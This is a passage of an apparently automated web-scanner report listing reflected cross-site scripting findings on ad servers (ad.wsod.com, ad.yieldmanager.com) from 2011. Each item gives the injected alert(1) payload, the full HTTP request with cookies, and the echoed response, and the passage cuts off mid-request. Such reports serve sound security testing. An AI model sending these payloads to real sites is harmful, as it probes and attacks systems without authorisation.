4.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4569b</script><script>alert(1)</script>c81f0fa8af3 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*4569b</script><script>alert(1)</script>c81f0fa8af3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 12:11:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
j0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*4569b</script><script>alert(1)</script>c81f0fa8af3">
...[SNIP]...

4.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af7b8</script><script>alert(1)</script>6382afb3d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*&af7b8</script><script>alert(1)</script>6382afb3d48=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 12:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2525

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*&af7b8</script><script>alert(1)</script>6382afb3d48=1">
...[SNIP]...

4.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ea4</script><script>alert(1)</script>fbf80e2f0b1 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131?click=http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*d8ea4</script><script>alert(1)</script>fbf80e2f0b1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 13:11:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
0rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*d8ea4</script><script>alert(1)</script>fbf80e2f0b1">
...[SNIP]...

4.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80241</script><script>alert(1)</script>c5dc4fefe22 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*80241</script><script>alert(1)</script>c5dc4fefe22 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2|33:1391:835:0:0:43835:1307361203:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 13 Jun 2011 11:20:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2519

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
bmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*80241</script><script>alert(1)</script>c5dc4fefe22">
...[SNIP]...

4.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbd25</script><script>alert(1)</script>0570fbfbabe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*&fbd25</script><script>alert(1)</script>0570fbfbabe=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2|33:1391:835:0:0:43835:1307361203:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 13 Jun 2011 11:20:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2525

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
mi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*&fbd25</script><script>alert(1)</script>0570fbfbabe=1">
...[SNIP]...

4.42. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1cfe"><script>alert(1)</script>b25c941bd8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=806254&b1cfe"><script>alert(1)</script>b25c941bd8e=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; ih="b!!!!E!'4@g!!!!#=$KA3!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=Gf(n`NBHr8*mOw]; bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:32 GMT
Pragma: no-cache
Content-Length: 4724
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600&b1cfe"><script>alert(1)</script>b25c941bd8e=1&s=806254&_salt=4127608432&t=2" target="_parent">
...[SNIP]...

4.43. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f866"-alert(1)-"91e191e34f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=ad&ad_size=160x600&section=1812134&9f866"-alert(1)-"91e191e34f5=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adopt.imiclk.com/emb/q?01AD=2-2-B0214141DED1291A4FF0463D9E06444BD5100362C216DF15CC667F2767BC1758-991AD395E12A9826D82DE593D62CFBCFAE28214D0237D0E3F7994E1DF381CB11&01RI=6BDF326C1D1D9D9&01NA=&size=160x600&m=3&l=1575606&c=162
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; 